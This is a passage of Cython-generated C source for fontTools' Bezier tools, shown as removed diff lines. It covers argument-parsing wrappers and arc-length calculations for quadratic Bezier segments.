(unlikely(!__pyx_t_5)) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":227 - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_d0, __pyx_v_d1); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) - __pyx_t_1 = (__pyx_t_3 >= 0.0); - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":228 - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) # <<<<<<<<<<<<<< - * a, b = abs(d0), abs(d1) - * return (a * a + b * b) / (a + b) - */ - __Pyx_XDECREF(__pyx_r); - 
__pyx_t_5 = PyFloat_FromDouble(__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt1))); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 228, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":227 - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) - */ - } - - /* "fontTools/misc/bezierTools.py":229 - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) # <<<<<<<<<<<<<< - * return (a * a + b * b) / (a + b) - * x0 = _dot(d, d0) / origDist - */ - __pyx_t_3 = __Pyx_c_abs_double(__pyx_v_d0); - __pyx_t_6 = __Pyx_c_abs_double(__pyx_v_d1); - __pyx_v_a = __pyx_t_3; - __pyx_v_b = __pyx_t_6; - - /* "fontTools/misc/bezierTools.py":230 - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) - * return (a * a + b * b) / (a + b) # <<<<<<<<<<<<<< - * x0 = _dot(d, d0) / origDist - * x1 = _dot(d, d1) / origDist - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_6 = ((__pyx_v_a * __pyx_v_a) + (__pyx_v_b * __pyx_v_b)); - __pyx_t_3 = (__pyx_v_a + __pyx_v_b); - if (unlikely(__pyx_t_3 == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 230, __pyx_L1_error) - } - __pyx_t_5 = PyFloat_FromDouble((__pyx_t_6 / __pyx_t_3)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 230, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":226 - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: # <<<<<<<<<<<<<< - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) - */ - } - - /* "fontTools/misc/bezierTools.py":231 - * a, b = abs(d0), abs(d1) - * return (a * a + b * b) / (a + b) - * x0 = _dot(d, d0) / origDist # <<<<<<<<<<<<<< - * x1 = _dot(d, d1) / origDist - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) - */ - __pyx_t_3 = 
__pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_d, __pyx_v_d0); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 231, __pyx_L1_error) - if (unlikely(__pyx_v_origDist == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 231, __pyx_L1_error) - } - __pyx_v_x0 = (__pyx_t_3 / __pyx_v_origDist); - - /* "fontTools/misc/bezierTools.py":232 - * return (a * a + b * b) / (a + b) - * x0 = _dot(d, d0) / origDist - * x1 = _dot(d, d1) / origDist # <<<<<<<<<<<<<< - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) - * return Len - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_d, __pyx_v_d1); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L1_error) - if (unlikely(__pyx_v_origDist == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 232, __pyx_L1_error) - } - __pyx_v_x1 = (__pyx_t_3 / __pyx_v_origDist); - - /* "fontTools/misc/bezierTools.py":233 - * x0 = _dot(d, d0) / origDist - * x1 = _dot(d, d1) / origDist - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) # <<<<<<<<<<<<<< - * return Len - * - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(__pyx_v_x1); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 233, __pyx_L1_error) - __pyx_t_6 = __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(__pyx_v_x0); if (unlikely(__pyx_t_6 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 233, __pyx_L1_error) - __pyx_t_7 = ((2.0 * (__pyx_t_3 - __pyx_t_6)) * __pyx_v_origDist); - __pyx_t_6 = (__pyx_v_scale * (__pyx_v_x1 - __pyx_v_x0)); - if (unlikely(__pyx_t_6 == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 233, __pyx_L1_error) - } - __pyx_v_Len = fabs((__pyx_t_7 / __pyx_t_6)); - - /* "fontTools/misc/bezierTools.py":234 - * x1 = _dot(d, d1) / origDist - * Len = abs(2 * (_intSecAtan(x1) - 
_intSecAtan(x0)) * origDist / (scale * (x1 - x0))) - * return Len # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_5 = PyFloat_FromDouble(__pyx_v_Len); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 234, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength, "approximateQuadraticArcLength(pt1, pt2, pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Uses Gauss-Legendre quadrature for a branch-free approximation.\n See :func:`calcQuadraticArcLength` for a slower but more accurate result.\n\n Args:\n pt1: Start point of the Bezier as 2D tuple.\n pt2: Handle point of the Bezier as 2D tuple.\n pt3: End point of the Bezier as 2D tuple.\n\n Returns:\n Approximate arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength = {"approximateQuadraticArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateQuadraticArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if 
CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 237, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 237, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLength", 1, 3, 3, 1); __PYX_ERR(0, 237, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 237, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLength", 1, 3, 3, 2); __PYX_ERR(0, 237, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, 
__pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateQuadraticArcLength") < 0)) __PYX_ERR(0, 237, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLength", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 237, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char 
*__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateQuadraticArcLength", 1); - - /* "fontTools/misc/bezierTools.py":251 - * Approximate arc length value. - * """ - * return approximateQuadraticArcLengthC(complex(*pt1), complex(*pt2), complex(*pt3)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_approximateQuadraticArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_t_4, 
__pyx_t_5, __pyx_t_6}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_7, 3+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 251, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC, "approximateQuadraticArcLengthC(double complex pt1, double complex pt2, double complex pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Uses Gauss-Legendre quadrature for a branch-free approximation.\n See :func:`calcQuadraticArcLength` for a slower but more accurate result.\n\n Args:\n pt1: Start 
point of the Bezier as a complex number.\n pt2: Handle point of the Bezier as a complex number.\n pt3: End point of the Bezier as a complex number.\n\n Returns:\n Approximate arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC = {"approximateQuadraticArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateQuadraticArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 
0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 254, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 254, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLengthC", 1, 3, 3, 1); __PYX_ERR(0, 254, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 254, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLengthC", 1, 3, 3, 2); __PYX_ERR(0, 254, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateQuadraticArcLengthC") < 0)) __PYX_ERR(0, 254, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 265, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) 
__PYX_ERR(0, 265, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 265, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLengthC", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 254, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3) { - double __pyx_v_v0; - double __pyx_v_v1; - double __pyx_v_v2; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateQuadraticArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":287 - * # abs(BezierCurveC[2].diff(t).subs({t:T})) for T in sorted(.5, .5sqrt(3/5)/2), - * # weighted 5/18, 8/18, 5/18 respectively. 
- * v0 = abs( # <<<<<<<<<<<<<< - * -0.492943519233745 * pt1 + 0.430331482911935 * pt2 + 0.0626120363218102 * pt3 - * ) - */ - __pyx_v_v0 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.492943519233745, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.430331482911935, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.0626120363218102, 0), __pyx_v_pt3))); - - /* "fontTools/misc/bezierTools.py":290 - * -0.492943519233745 * pt1 + 0.430331482911935 * pt2 + 0.0626120363218102 * pt3 - * ) - * v1 = abs(pt3 - pt1) * 0.4444444444444444 # <<<<<<<<<<<<<< - * v2 = abs( - * -0.0626120363218102 * pt1 - 0.430331482911935 * pt2 + 0.492943519233745 * pt3 - */ - __pyx_v_v1 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt1)) * 0.4444444444444444); - - /* "fontTools/misc/bezierTools.py":291 - * ) - * v1 = abs(pt3 - pt1) * 0.4444444444444444 - * v2 = abs( # <<<<<<<<<<<<<< - * -0.0626120363218102 * pt1 - 0.430331482911935 * pt2 + 0.492943519233745 * pt3 - * ) - */ - __pyx_v_v2 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_diff_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.0626120363218102, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.430331482911935, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.492943519233745, 0), __pyx_v_pt3))); - - /* "fontTools/misc/bezierTools.py":295 - * ) - * - * return v0 + v1 + v2 # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyFloat_FromDouble(((__pyx_v_v0 + __pyx_v_v1) + __pyx_v_v2)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 295, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - 
